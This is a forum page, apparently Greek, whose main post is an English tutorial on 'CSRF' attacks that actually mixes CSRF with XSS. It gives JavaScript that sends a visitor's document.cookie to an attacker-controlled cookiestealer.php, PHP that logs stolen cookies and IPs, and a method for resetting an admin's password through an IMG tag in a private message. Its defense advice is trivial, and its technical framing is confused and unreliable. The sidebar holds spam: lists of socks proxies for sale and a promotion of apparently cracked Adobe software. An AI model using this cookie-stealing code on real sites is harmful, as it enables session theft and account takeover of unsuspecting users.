Jump to content

Recommended Posts

NiKR

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery. If you say XSRF the X obviously stands for the cross, just like XSS (Cross-Site Scripting).

I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

1) What is Cross-Site Request Forgery?
2) How do I find CSRF vulnerabilities?
3) How to take advantage of the IMG tag?
4) Keep it Simple
5) Securing yourself against CSRF
6) Conclusion

 

1) What is Cross-Site Request Forgery?

When performing a CSRF attack you can inject code in a webpage, like on forums or other websites where you can post comments on whatever what. The idea is to execute a HTTP request once a user visits the affected webpage, because this attack takes place on the side of the victim (Client-Sided), the request will be executed from the machine of the victim that vists the webpage. If, for example, a user is logged in to YouTube, a link can be crafted that can be hidden on a forum, which logs you out of YouTube.

We can go way further with this by, for example, making a request to a webpage, that, upon visiting, makes a few other request by using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found in webpages with low security that allow everyone to make posts and comments. (Guests can comment) The fun part in that, is that you can create a post that can be seen by everyone visiting that page.

Though, it has to be possible to use HTML or BBCode.

The IMG Tag

A IMG tag in HTML (<img>) is often used as the following :

<img src="http://website.com/myimage.jpg">

As you may know PHP pages are also able to return images. This gives the possibility to do this, for example.

<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag .

 

3) How to take advantage of the IMG tag?

Yea, so how do we actually do it? Well, as I said PHP pages can also return images. Let's get to this simple scenario:

You've just found a webpage with the possibility to place comments, and you're able to use HTML within the comments. The website does not check the refer, and it's possible to use PHP extensions within the IMG tag. You write some PHP code that returns an image, but at the same time executes some Javascript too, that sends the victim to another page. If someone visits the page where you used the IMG tag, a picture will be shown, but at the same time the Javascript code is running as well. This way you can steal cookies, for example, or even write and post comments under somebody elses name.
Pretend we have the following code:

<html><head><script type="text/javascript">
    var http = GetXmlHttpObject();
    if(http != null)
    {
      var url = "http://mywebsite.com/cookiestealer.php?cookie=" + document.cookie; 
      http.open("GET", url, false);
      http.send(null);
    }

    function GetXmlHttpObject()
    {

Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that executes a HTML request to a certain page.

If you're a little familiar with JS you can see there was make a HTTP GET request to the page mywebsite.com/cookiestealer.php. After that, a GET arguement will be given that has the value 'document.cookie'. Document.cookie will always contain the cookie of the page where the Javascript code is being executed. In this case it will steal the cookie of the user that visits the page.
On the website I've found I've uploaded the following code:

<?php
    $cookie = $_GET['cookie'];
    $ip = $_SERVER['REMOTE_ADDR'];

    $fh = fopen("log.txt", 'a') or die("can't open file");
    fwrite($fh, $cookie . "\n" . $ip . "\n\n");

    fclose($fh);
?>

This PHP code will get the value of the GET arguement and the IP address of the person visiting your page. After that the code would add this information into the file called 'log.txt'.

Every time someone visits the page where I posted the link with the IMG tag with a link to a page that executes the JS code, the code will request the cookiestealer and place the cookie in the GET arguement.
At last, you can see the cookies flow into your log.

4) Keep it Simple.

In the above code I showed a kind of extensive example. Really bad secured websites with bad software have even bigger bugs than that.

Like that you can for example first install the forum software on your local software, and look what HTTP GET request you have to make to change the password of the administrator. Pretend it's like the following:

You'd have to send that URL to the Administrator in a Private Message, in a IMG tag. If the administrator reads the message, a request will be made to the above URL and will change the Admin password to mynewpass123.
I have to say, it's often alot harder than the above example.

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, stop loading images.

6) Conclusion
So what is a CSRF attack..? A CSRF attack is an attack that can be performed with less effort, if you know what you're doing, and can do alot of damage. Protecting against CSRF attacks is harder, but good to accomplish if you're working on, for example, a CMS.

  • Μου αρέσει 1

Share this post


Link to post
Share on other sites

Δημιουργήστε ένα λογαριασμό ή συνδεθείτε προκειμένου να το δείτε

Πρέπει να είστε μέλος για να μπορέσετε να αφήσετε κάποιο σχόλιο

Δημιουργία λογαριασμού

Κάντε μια δωρεάν εγγραφή στην κοινότητά μας. Η εγγραφές μας είναι εύκολες.!

Εγγραφή τώρα

Σύνδεση

Εάν έχετε ήδη λογαριασμό σε αυτό το Forum; Συνδεθείτε εδώ.

Συνδεθείτε τώρα

  • Μηνύματα

    • dichvusocks
      Payment Instantly perfectmoney, bitcoin, wmtransfer, dash, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 162.243.210.52:35001 | 0.03 | New York | 10011 | yncu.co | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 162.243.210.52:30558 | 0.03 | New York | 10011 | yncu.co | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 162.243.161.178:29861 | 0.03 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.100:58691 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.190.163:37083 | 0.42 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.136.232:46553 | 0.24 | Arizona | 85260 | ip-166-62-125-137.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.140.100:58353 | 0.24 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 108.59.8.86:64039 | 0.27 | New York | 13069 | cpe-67-246-116-66.twcny.res.rr.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:45196 | 0.49 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:45634 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 108.59.8.86:20244 | 0.51 | Arizona | 85207 | ip68-110-112-8.ph.ph.cox.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 108.59.8.86:17426 | 0.52 | Arizona | 85083 | ip70-174-202-20.ph.ph.cox.net | United States | Blacklist: No | Checked at http://dichvusocks.us
      LIVE | 185.19.218.37:32563 | 0.37 | Unknow | Unknow | ns3083377.ip-145-239-7.eu | United Kingdom | Blacklist: No | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:50287 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:38976 | 0.49 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:40817 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:39413 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 50.63.167.72:47410 | 0.23 | Arizona | 85260 | ip-192-169-140-100.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
       
    • Bulgaros
      Το Απόλυτο Και Ηγετικό Στα PDF Αρχεία ΔΟΚΙΜΑΣΜΕΝΟ ! ! ! Adobe Acrobat 12 Pro DC 2019.008.20081 (English) Multilanguage Adobe Acrobat DC (γνωστό και ως το Acrobat 12 ή Acrobat XII) είναι τώρα shipping!
      DC σημαίνει έγγραφο Cloud, η οποία είναι η νέα σειρά της Adobe ολοκληρωμένων ηλεκτρονικών υπηρεσιών
      που θα βοηθήσει τους ανθρώπους και τις επιχειρήσεις να διαχειρίζονται καλύτερα τα κρίσιμα έγγραφα.
      Στην καρδιά του εγγράφου Cloud είναι το Acrobat DC το βιομηχανικό πρότυπο για την δημιουργία,
      την ανταλλαγή και την επεξεργασία αρχείων PDF το οποίο έχει εντελώς αναδιοργανώσει με αυτή την έκδοση. Είναι σημαντικό, αυτή η νέα έκδοση του Acrobat συνεχίζει ως επιτραπέζιο προϊόν τόσο Pro ή Standard εκδόσεις,
      και είναι διαθέσιμα είτε μέσω συνδρομής είτε με διαρκή άδεια.
      Η Adobe έχει ενσωματώσει πολλά νέα χαρακτηριστικά και βελτιώσεις για να φέρει το Acrobat στην σύγχρονη εποχή.
      Επιπλέον, η εταιρεία κινείται σε ετήσια μοντέλα εκδόσεων για το Acrobat...
      Έτσι, η αναθεώρηση αυτή ονομάζεται επίσημα το Acrobat DC 2015 Release
      και η τεχνική αριθμός έκδοσης είναι στην πραγματικότητα 15 και όχι 12. Η δοκιμαστική έκδοση περιλαμβάνει όλα τα χαρακτηριστικά της επιφάνειας εργασίας του Acrobat Pro DC,
      συν ένα περιορισμένο σύνολο των υπηρεσιών του εγγράφου Cloud συμπεριλαμβανομένης της δυνατότητας να συμπληρώσετε,
      να υπογράψετε και να αποστείλει έντυπα σε μια συσκευή tablet, να αποθηκεύουν και να μοιράζονται τα αρχεία
      σε απευθείας σύνδεση και πρόσβαση είδαν πρόσφατα αρχεία σε όλες τις συσκευές. Μια πληρωμένη συνδρομή απαιτείται για να επωφεληθούν από άλλες υπηρεσίες όπως είναι η ικανότητα να πάρει υπογραφές από τους άλλους
      να στείλετε και να παρακολουθείτε τα έγγραφα σε απευθείας σύνδεση
      και τη δημιουργία και εξαγωγή PDF από ένα πρόγραμμα περιήγησης ή κινητή συσκευή.
      Εάν και όταν λήξει η δωρεάν δοκιμαστική έκδοση,
      μπορείτε ακόμα να χρησιμοποιήσετε το Acrobat για να δείτε αρχεία PDF, και να συμπληρώσετε φόρμες
      αλλά για να έχουν πρόσβαση στο πλήρες σύνολο δυνατοτήτων και πάλι, θα πρέπει να αγοράσετε το Acrobat. Σημειώστε ότι αυτή η πρόσφατα αναβαθμισμένη έκδοση επιφάνειας εργασίας του Acrobat Pro DC
      περιλαμβάνεται επίσης ως μία από τις πολλές εφαρμογές που όλοι οι συνδρομητές έχουν πάρει με το πλήρες Adobe Creative Cloud.
      Τώρα όλοι οι εργαζόμενοι της εταιρείας σας μπορούν να εκτελέσουν με συνέπεια πολλαπλών βημάτων στην διαδικασία χρησιμοποιώντας το Adobe Acrobat DC.
      Είναι πιο εύκολο απ 'όσο νομίζετε. Πρόσθετες πληροφορίες και χαρακτηριστικά:
      Το γραφείο σας είναι όπως και στα κινητά.
      Το Acrobat DC με τις υπηρεσίες Cloud εγγράφου είναι γεμάτη με δεκάδες εργαλεία που χρειάζεστε για να μετατρέψετε,
      να επεξεργαστείτε και να υπογράψουν αρχεία PDF. Είναι ακριβώς όπως και στα κινητά.
      Έτσι, μπορείτε να ξεκινήσετε ένα έγγραφο κατά την εργασία, στο τρένο,
      και να το στείλετε για έγκριση από το σαλόνι σας, απλά, χωρίς να χάνετε τίποτα. Το Acrobat DC λειτουργεί σαν μαγικό.
      Επεξεργαστείτε οποιοδήποτε αρχείο, ακόμη και ένα χάρτινο.
      Μόλις πάρουμε μια φωτογραφία με το τηλέφωνό μας, στη συνέχεια ανοίξτε το στην επιφάνεια εργασίας σας.
      Πριν την δείτε με τα μάτια σας, το Acrobat θα μετατραπεί μαγικά σε ένα PDF,
      μπορείτε να επεξεργαστείτε στο tablet σας - πλήρης, με προσαρμοσμένες γραμματοσειρές που ταιριάζουν με τον τύπο στο αρχικό αρχείο σας. e-υπογραφή. Παντού.
      Το Acrobat DC φέρνει την e-υπογραφή σε περισσότερα από ένα δισεκατομμύριο συσκευές σε όλο τον κόσμο.
      Τώρα ο καθένας μπορεί να υπογράψει νόμιμα έγγραφα με ένα δάχτυλο σε μια συσκευή
      με δυνατότητα αφής - ή με λίγα κλικ σε ένα πρόγραμμα περιήγησης.
      Περισσότερο από ακριβώς μια app υπογραφή, το Acrobat DC καθιστά εύκολο να στείλετε,
      να παρακολουθείτε και να αποθηκεύουν υπογεγραμμένα έγγραφα. Είναι όμορφο, με δυνατότητα αφής UI.
      Με δυνατότητα αφής και εντελώς κινητό, με ένα λαμπρό νέο UI που διατηρεί όλα τα εργαλεία
      που χρειάζεστε στις άκρες των δαχτύλων σας το Acrobat DC είναι τόσο εκπληκτικό,
      και όλοι θα αναρωτιούνται πώς θα καταφέρουν ποτέ να κάνουν τη δουλειά τους χωρίς αυτό. Γλώσσα: Ουγγρικά, Ολλανδικά, Δανέζικα, Ισπανικά, Ιταλικά, Κινέζικα (απλοποιημένα), Κινέζικα (παραδοσιακά), Κορεατικά, Γερμανικά,
      Νορβηγικά, Πολωνικά, Πορτογαλικά , ρωσικά, σλοβακικά, σλοβενικά, τουρκικά, ουκρανικά, φινλανδική, γαλλική, τσεχική, σουηδική,
      Ιαπωνικά,Αγγλικά, με την υποστήριξη του αραβική γραφή και Αγγλικά με Εβραϊκά, Γαλλικά (Μαρόκο) Αλλαγές της Έκδοσης:
      https://www.adobe.com/devnet-docs/acrobatetk/tools/ReleaseNotesDC/continuous/dccontinuousnovember2018.html#dccontinuousnovembertwentyeighteen
      1.5 GHz or faster processor
      Microsoft® Windows® 7 (32 bit and 64 bit), Windows 8 (32 bit and 64 bit),
       Windows Server 2008 R2 (32 bit and 64 bit), Windows Server 2012 (64 bit), or Windows Server 2012 R2 (64 bit)
      1.0 GB of RAM (1GB recommended)
      4.5 GB of available hard-disk space
      1024x768 screen resolution
      Internet Explorer 8, 9, or 10 (Windows 8 minimum), or 11; Firefox Extended Support Release
      Video hardware acceleration (optional)
      https://acrobat.adobe.com/us/en/products/acrobat-pro.html




    • vn5socks.net
      LIVE ~ 222.165.225.245:27802 | 0.063 | Unknown | Unknown | Unknown | Indonesia | Checked at vn5socks.net
      LIVE ~ 185.108.76.37:9050 | 0.201 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 220.79.34.109:2018 | 0.126 | Seoul | 11 | Unknown | Korea, Republic of | Checked at vn5socks.net
      LIVE ~ 162.144.122.225:56832 | 0.194 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 37.59.56.88:63301 | 0.241 | Unknown | Unknown | Unknown | France | Checked at vn5socks.net
      LIVE ~ 95.110.228.190:8975 | 0.199 | Unknown | Unknown | Unknown | Italy | Checked at vn5socks.net
      LIVE ~ 71.238.27.187:42970 | 0.237 | Troy | MI | 48084 | United States | Checked at vn5socks.net
      LIVE ~ 119.28.191.18:7070 | 0.046 | Beijing | 22 | Unknown | China | Checked at vn5socks.net
      LIVE ~ 187.176.123.155:9999 | 0.279 | Zapopan | 14 | Unknown | Mexico | Checked at vn5socks.net
      LIVE ~ 87.247.19.126:9999 | 0.347 | Unknown | Unknown | Unknown | Kazakhstan | Checked at vn5socks.net
      LIVE ~ 118.139.176.242:33481 | 0.164 | Unknown | Unknown | Unknown | Singapore | Checked at vn5socks.net
      LIVE ~ 194.105.25.25:9999 | 0.313 | Cluj | 13 | Unknown | Romania | Checked at vn5socks.net
      LIVE ~ 79.106.133.123:1080 | 0.432 | Unknown | Unknown | Unknown | Albania | Checked at vn5socks.net
      LIVE ~ 41.90.103.102:9999 | 0.427 | Nairobi | 05 | Unknown | Kenya | Checked at vn5socks.net
      LIVE ~ 192.169.249.149:36997 | 0.24 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 201.161.223.150:9999 | 0.301 | Campeche | 04 | Unknown | Mexico | Checked at vn5socks.net
      LIVE ~ 162.243.0.155:63711 | 0.236 | Unknown | Unknown | Unknown | Unknown | Checked at vn5socks.net
      LIVE ~ 208.113.193.44:23511 | 0.231 | Brea | CA | 92821 | United States | Checked at vn5socks.net
    • shopsocks5.com
      [Shopsocks5.com] Service Socks5 Cheap
      Payment Instantly Perfectmoney, Bitcoin, Wmtransfer, BTC-E ( Please click Buy Socks )
      Check Socks Online  http://shopsocks5.com/check/





        Live | 104.238.97.215:45448 | United States | Scottsdale | AZ | 85260 | Checked at http://shopsocks5.com Live | 118.139.176.242:40095 | Singapore | Singapore | 00 | Unknown | Checked at http://shopsocks5.com Live | 107.170.42.147:31084 | United States | New York | NY | 10118 | Checked at http://shopsocks5.com Live | 217.61.108.219:7007 | Italy | Arezzo | 16 | 52100 | Checked at http://shopsocks5.com Live | 138.68.143.47:37736 | United States | Wilmington | DE | 19880 | Checked at http://shopsocks5.com Live | 198.12.157.31:46906 | United States | Scottsdale | AZ | 85260 | Checked at http://shopsocks5.com Live | 178.62.96.118:11614 | United Kingdom | London | H9 | EC4N | Checked at http://shopsocks5.com Live | 91.206.30.205:3129 | Ukraine | Kiev | 12 | Unknown | Checked at http://shopsocks5.com Live | 125.227.69.220:3347 | Taiwan | Unknown | Unknown | Unknown | Checked at http://shopsocks5.com Live | 198.12.157.28:29014 | United States | Scottsdale | AZ | 85260 | Checked at http://shopsocks5.com Live | 70.113.157.87:13009 | United States | Unknown | Unknown | Unknown | Checked at http://shopsocks5.com Live | 188.165.222.158:8020 | France | Unknown | Unknown | Unknown | Checked at http://shopsocks5.com Live | 119.28.191.18:7070 | China | Beijing | 22 | Unknown | Checked at http://shopsocks5.com Live | 163.172.166.20:4480 | United Kingdom | Southend | M5 | SS2 | Checked at http://shopsocks5.com Live | 76.73.231.58:59881 | United States | Seymour | TN | 37865 | Checked at http://shopsocks5.com Live | 95.216.55.131:1188 | Ukraine | Unknown | Unknown | Unknown | Checked at http://shopsocks5.com
    • dichvusocks
      zPayment Instantly perfectmoney, bitcoin, wmtransfer, dash, ETH (Please click Buy Socks)
      Update Tools Client Dichvusocks.us http://dichvusocks.us/tools.php Link check socks http://check.dichvusocks.us/
      LIVE | 37.59.8.29:26204 | 1.35 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 172.11.196.133:26766 | 0.4 | California | 94025 | 172-11-196-133.lightspeed.sntcca.sbcglobal.net | United States | Blacklist: No | Checked at http://dichvusocks.us
      LIVE | 94.102.127.128:9050 | 3.15 | Unknow | Unknow | tor-exit.eecs.umich.edu | Anonymous Proxy | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:1661 | 4.36 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 95.110.227.5:56322 | 0.42 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 107.181.174.75:55667 | 4.56 | Georgia | 30303 | vds-184272.hosted-by-itldc.com | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:1034 | 7.36 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 36.89.89.67:9999 | 8.52 | Jakarta Raya | Unknow | PT Telkom Indonesia | Indonesia | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 192.169.142.205:58648 | 3.3 | Arizona | 85260 | ip-192-169-136-149.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 103.216.82.207:6667 | 0.96 | Gujarat | 396450 | Gtpl Dcpl Private Limited | India | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 125.227.69.220:3346 | 0.91 | Unknow | Unknow | | Unknow | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:59318 | 3.35 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 132.148.13.162:19136 | 7.23 | Arizona | 85260 | ip-192-169-233-35.ip.secureserver.net | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 76.73.231.58:59881 | 0.21 | Florida | 33713 | WideOpenWest | United States | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 119.28.191.18:7070 | 0.95 | Unknow | Unknow | Tencent cloud computing | Hong Kong | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:34133 | 2.34 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 125.227.69.220:3262 | 0.92 | Unknow | Unknow | 114-26-165-166.dynamic-ip.hinet.net | Taiwan | Blacklist: Yes | Checked at http://dichvusocks.us
      LIVE | 37.59.8.29:29945 | 7.36 | Unknow | Unknow | ns3099982.ovh.net | France | Blacklist: Yes | Checked at http://dichvusocks.us
       
×